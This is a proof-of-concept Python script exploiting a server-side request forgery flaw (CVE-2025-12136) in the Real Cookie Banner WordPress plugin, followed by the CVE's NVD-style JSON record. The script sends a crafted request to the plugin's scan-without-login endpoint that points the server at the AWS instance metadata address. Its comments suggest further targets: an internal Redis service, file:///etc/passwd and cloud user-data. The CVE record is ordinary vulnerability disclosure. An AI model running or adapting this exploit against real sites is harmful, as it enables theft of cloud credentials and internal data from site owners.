CVE-2025-12136

# CVE-2025-12136 SSRF PoC # Real Cookie Banner Plugin < = 5.2.4 # Requires administrator-level access import requests import sys target_url = "http://target-wordpress-site.com" # Target must have Real Cookie Banner plugin installed # Construct the vulnerable endpoint endpoint = "/wp-json/real-cookie-banner/v1/scanner/scan-without-login" url = target_url + endpoint # Target for SSRF (internal service, metadata, etc.) ssrf_target = "http://169.254.169.254/latest/meta-data/" # AWS metadata # Prepare the POST request with SSRF payload data = { "url": ssrf_target } # If authentication is required, include cookies/tokens # headers = { # "Cookie": "wordpress_admin_cookie=...", # "Authorization": "Bearer ..." # } try: print(f"[*] Sending SSRF request to: {url}") print(f"[*] Target URL for SSRF: {ssrf_target}") response = requests.post(url, data=data, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body:\n{response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Alternative: Test with different SSRF targets # Internal service: http://localhost:6379/ (Redis) # File read: file:///etc/passwd # Cloud metadata: http://169.254.169.254/latest/user-data/

{"cve": {"id": "CVE-2025-12136", "sourceIdentifier": "[email protected]", "published": "2025-10-24T10:15:38.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Real Cookie Banner: GDPR & ePrivacy Cookie Consent plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.2.4. This is due to insufficient validation on the user-supplied URL in the '/scanner/scan-without-login' REST API endpoint. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services via the `url` parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://infosecstuff.com/SSRF-Real-Cookie-Banner", "source": "[email protected]"}, {"url": "https://owasp.org/www-community/attacks/Server_Side_Request_Forgery", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L210", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3378727", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f559d7f-3faf-4549-b529-f4db03dce2dd?source=cve", "source": "[email protected]"}]}}